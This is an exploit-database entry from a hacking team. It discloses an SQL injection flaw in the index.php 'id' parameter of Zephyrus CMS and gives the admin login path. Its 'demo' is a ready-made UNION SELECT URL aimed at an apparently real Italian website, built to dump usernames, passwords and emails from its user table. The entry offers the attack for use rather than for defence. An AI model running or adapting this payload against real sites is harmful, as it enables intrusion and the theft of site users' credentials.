Zephyrus CMS (index.php) SQL Injection Vulnerability

2010-03-23
ID: 11410
CVE: None
Download vulnerable application: None
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm Phenom  member from Inj3ct0r Team             1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 [+] Discovered by: Phenom
 #[Exploit Title] : CMS Zephyrus (index.php) SQL Injection Vulnerability
 [Author] = Phenom
 [CMS]   = CMS Zephyrus
 [Dork] = I hate script kiddies
 [Date] = 2010-03-23
 #[Exploit] :
 [Bug] = [index.php?pagina=news&id=]
 [Usage] = http://www.site/index.php?pagina=news&id=[SQL Injection]
 [Login] = http://site/index_priv.php
 #[Demo] :
 [+] http://www.amicinsiemeviareggio.it/index.php?pagina=news&id=-68+union+select+1,group_concat%28concat%28username,0x3a,password,0x3a,email%29%20separator%200x3c62723e%29,3,4,5,6,7,8,9,10+from+utenti--
 #[Thanks] :
 [+] all Inj3ct0r Members
1-4-2 (www02)